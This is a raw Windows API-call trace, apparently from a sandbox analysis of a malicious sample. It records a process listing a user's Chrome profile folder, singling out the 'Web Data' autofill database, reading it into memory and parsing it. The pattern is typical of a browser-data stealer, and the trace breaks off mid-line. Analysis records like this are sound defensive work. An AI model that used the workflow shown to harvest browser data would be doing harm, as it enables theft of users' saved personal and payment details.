[0590.085] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.085] StrStrIW (lpFirst="Top Sites", lpSrch="Web Data") returned 0x0 [0590.085] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.085] lstrlenW (lpString="\\") returned 1 [0590.085] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.085] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.085] lstrlenW (lpString="Top Sites-journal") returned 17 [0590.085] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.085] LocalAlloc (uFlags=0x40, uBytes=0x124) returned 0x5d4db0 [0590.085] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.085] StrStrIW (lpFirst="Top Sites-journal", lpSrch="Web Data") returned 0x0 [0590.085] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.085] lstrlenW (lpString="\\") returned 1 [0590.085] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.085] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.085] lstrlenW (lpString="Visited Links") returned 13 [0590.085] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.085] LocalAlloc (uFlags=0x40, uBytes=0x11c) returned 0x5d4ee0 [0590.085] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.085] StrStrIW (lpFirst="Visited Links", lpSrch="Web Data") returned 0x0 [0590.085] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.085] lstrlenW (lpString="\\") returned 1 [0590.085] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.085] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.085] lstrlenW (lpString="Web Data") returned 8 [0590.085] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.085] LocalAlloc (uFlags=0x40, uBytes=0x112) returned 0x5d5008 [0590.085] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.085] StrStrIW (lpFirst="Web Data", lpSrch="Web Data") returned="Web Data" [0590.085] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52db80 | out: ppstm=0x52db80*=0x57ea78) returned 0x0 [0590.085] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\web data"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.086] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0590.086] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb70, lpOverlapped=0x0 | out: lpBuffer=0x52cb78*, lpNumberOfBytesRead=0x52cb70*=0x1000, lpOverlapped=0x0) returned 1 [0590.087] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb78) returned 0x0 [0590.087] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb70, lpOverlapped=0x0 | out: lpBuffer=0x52cb78*, lpNumberOfBytesRead=0x52cb70*=0x1000, lpOverlapped=0x0) returned 1 [0590.087] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb78) returned 0x0 [0590.087] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb70, lpOverlapped=0x0 | out: lpBuffer=0x52cb78*, lpNumberOfBytesRead=0x52cb70*=0x1000, lpOverlapped=0x0) returned 1 [0590.087] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb78) returned 0x0 [0590.087] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb70, lpOverlapped=0x0 | out: lpBuffer=0x52cb78*, lpNumberOfBytesRead=0x52cb70*=0x1000, lpOverlapped=0x0) returned 1 [0590.087] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb78) returned 0x0 [0590.087] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb70, lpOverlapped=0x0 | out: lpBuffer=0x52cb78*, lpNumberOfBytesRead=0x52cb70*=0x1000, lpOverlapped=0x0) returned 1 [0590.087] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb78) returned 0x0 [0590.087] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb70, lpOverlapped=0x0 | out: lpBuffer=0x52cb78*, lpNumberOfBytesRead=0x52cb70*=0x1000, lpOverlapped=0x0) returned 1 [0590.087] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb78) returned 0x0 [0590.087] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb70, lpOverlapped=0x0 | out: lpBuffer=0x52cb78*, lpNumberOfBytesRead=0x52cb70*=0x1000, lpOverlapped=0x0) returned 1 [0590.087] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb78) returned 0x0 [0590.087] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb70, lpOverlapped=0x0 | out: lpBuffer=0x52cb78*, lpNumberOfBytesRead=0x52cb70*=0x1000, lpOverlapped=0x0) returned 1 [0590.088] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb78) returned 0x0 [0590.088] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb70, lpOverlapped=0x0 | out: lpBuffer=0x52cb78*, lpNumberOfBytesRead=0x52cb70*=0x1000, lpOverlapped=0x0) returned 1 [0590.088] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb78) returned 0x0 [0590.088] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb70, lpOverlapped=0x0 | out: lpBuffer=0x52cb78*, lpNumberOfBytesRead=0x52cb70*=0x1000, lpOverlapped=0x0) returned 1 [0590.088] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb78) returned 0x0 [0590.088] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb70, lpOverlapped=0x0 | out: lpBuffer=0x52cb78*, lpNumberOfBytesRead=0x52cb70*=0x1000, lpOverlapped=0x0) returned 1 [0590.088] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb78) returned 0x0 [0590.088] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb70, lpOverlapped=0x0 | out: lpBuffer=0x52cb78*, lpNumberOfBytesRead=0x52cb70*=0x1000, lpOverlapped=0x0) returned 1 [0590.088] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb78) returned 0x0 [0590.088] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb70, lpOverlapped=0x0 | out: lpBuffer=0x52cb78*, lpNumberOfBytesRead=0x52cb70*=0x1000, lpOverlapped=0x0) returned 1 [0590.088] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb78) returned 0x0 [0590.088] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb70, lpOverlapped=0x0 | out: lpBuffer=0x52cb78*, lpNumberOfBytesRead=0x52cb70*=0x1000, lpOverlapped=0x0) returned 1 [0590.088] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb78) returned 0x0 [0590.088] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb70, lpOverlapped=0x0 | out: lpBuffer=0x52cb78*, lpNumberOfBytesRead=0x52cb70*=0x1000, lpOverlapped=0x0) returned 1 [0590.088] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb78) returned 0x0 [0590.088] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb70, lpOverlapped=0x0 | out: lpBuffer=0x52cb78*, lpNumberOfBytesRead=0x52cb70*=0x1000, lpOverlapped=0x0) returned 1 [0590.088] IStream:Commit (This=0x57ea78, grfCommitFlags=0x52cb78) returned 0x0 [0590.088] ReadFile (in: hFile=0x5ac, lpBuffer=0x52cb78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb70, lpOverlapped=0x0 | out: lpBuffer=0x52cb78*, lpNumberOfBytesRead=0x52cb70*=0x0, lpOverlapped=0x0) returned 1 [0590.088] CloseHandle (hObject=0x5ac) returned 1 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.088] IStream:SetSize (This=0x57ea78, libNewSize=0x52db58) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x10, cb=0x0, dwLockType=0x0) returned 0x0 [0590.088] IStream:SetSize (This=0x57ea78, libNewSize=0x52db42) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x12, cb=0x0, dwLockType=0x0) returned 0x0 [0590.088] IStream:SetSize (This=0x57ea78, libNewSize=0x52db43) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x13, cb=0x0, dwLockType=0x0) returned 0x0 [0590.088] IStream:SetSize (This=0x57ea78, libNewSize=0x52db43) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x14, cb=0x0, dwLockType=0x0) returned 0x0 [0590.088] IStream:SetSize (This=0x57ea78, libNewSize=0x52db43) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x15, cb=0x0, dwLockType=0x0) returned 0x0 [0590.088] IStream:SetSize (This=0x57ea78, libNewSize=0x52db43) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x16, cb=0x0, dwLockType=0x0) returned 0x0 [0590.088] IStream:SetSize (This=0x57ea78, libNewSize=0x52db43) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.088] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x17, cb=0x0, dwLockType=0x0) returned 0x0 [0590.089] IStream:SetSize (This=0x57ea78, libNewSize=0x52db43) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x18, cb=0x0, dwLockType=0x0) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x20, cb=0x0, dwLockType=0x1) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x38, cb=0x0, dwLockType=0x0) returned 0x0 [0590.089] IStream:SetSize (This=0x57ea78, libNewSize=0x52db40) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x3c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x28, cb=0x0, dwLockType=0x1) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x64, cb=0x0, dwLockType=0x1) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x64, cb=0x0, dwLockType=0x0) returned 0x0 [0590.089] IStream:SetSize (This=0x57ea78, libNewSize=0x52dae7) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x65, cb=0x0, dwLockType=0x0) returned 0x0 [0590.089] IStream:SetSize (This=0x57ea78, libNewSize=0x52dae6) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x67, cb=0x0, dwLockType=0x0) returned 0x0 [0590.089] IStream:SetSize (This=0x57ea78, libNewSize=0x52dae6) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x69, cb=0x0, dwLockType=0x0) returned 0x0 [0590.089] IStream:SetSize (This=0x57ea78, libNewSize=0x52dae6) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x6b, cb=0x0, dwLockType=0x0) returned 0x0 [0590.089] IStream:SetSize (This=0x57ea78, libNewSize=0x52dae7) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.089] IStream:LockRegion (This=0x57ea78, libOffset=0x6c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.089] IStream:SetSize (This=0x57ea78, libNewSize=0x52dae4) returned 0x0 [0590.089] LocalAlloc (uFlags=0x40, uBytes=0x10080) returned 0x2ee9858 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x70, cb=0x0, dwLockType=0x0) returned 0x0 [0590.090] IStream:SetSize (This=0x57ea78, libNewSize=0x52dae6) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x72, cb=0x0, dwLockType=0x0) returned 0x0 [0590.090] IStream:SetSize (This=0x57ea78, libNewSize=0x52dae6) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x7fb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x7fb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.090] IStream:SetSize (This=0x57ea78, libNewSize=0x52dae4) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x7ff, cb=0x0, dwLockType=0x0) returned 0x0 [0590.090] IStream:SetSize (This=0x57ea78, libNewSize=0x52dac7) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x6000, cb=0x0, dwLockType=0x0) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x6000, cb=0x0, dwLockType=0x0) returned 0x0 [0590.090] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8b) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x6001, cb=0x0, dwLockType=0x0) returned 0x0 [0590.090] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x6003, cb=0x0, dwLockType=0x0) returned 0x0 [0590.090] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x6005, cb=0x0, dwLockType=0x0) returned 0x0 [0590.090] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.090] IStream:LockRegion (This=0x57ea78, libOffset=0x6007, cb=0x0, dwLockType=0x0) returned 0x0 [0590.090] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8b) returned 0x0 [0590.090] LocalAlloc (uFlags=0x40, uBytes=0x10080) returned 0x2ef98e0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x6008, cb=0x0, dwLockType=0x0) returned 0x0 [0590.091] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x600a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.091] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x600c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.091] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x600e, cb=0x0, dwLockType=0x0) returned 0x0 [0590.091] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x6010, cb=0x0, dwLockType=0x0) returned 0x0 [0590.091] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x6012, cb=0x0, dwLockType=0x0) returned 0x0 [0590.091] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x6014, cb=0x0, dwLockType=0x0) returned 0x0 [0590.091] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x6016, cb=0x0, dwLockType=0x0) returned 0x0 [0590.091] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x6018, cb=0x0, dwLockType=0x0) returned 0x0 [0590.091] IStream:SetSize (This=0x57ea78, libNewSize=0x52da8a) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x6767, cb=0x0, dwLockType=0x0) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x6767, cb=0x0, dwLockType=0x0) returned 0x0 [0590.091] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.091] IStream:LockRegion (This=0x57ea78, libOffset=0x6768, cb=0x0, dwLockType=0x0) returned 0x0 [0590.091] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.091] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.091] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.092] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.092] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.092] IStream:LockRegion (This=0x57ea78, libOffset=0x6769, cb=0x0, dwLockType=0x0) returned 0x0 [0590.092] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.092] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.092] LocalFree (hMem=0x2f09968) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.092] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.092] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ffd8 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.092] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.092] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.092] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.092] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.092] IStream:LockRegion 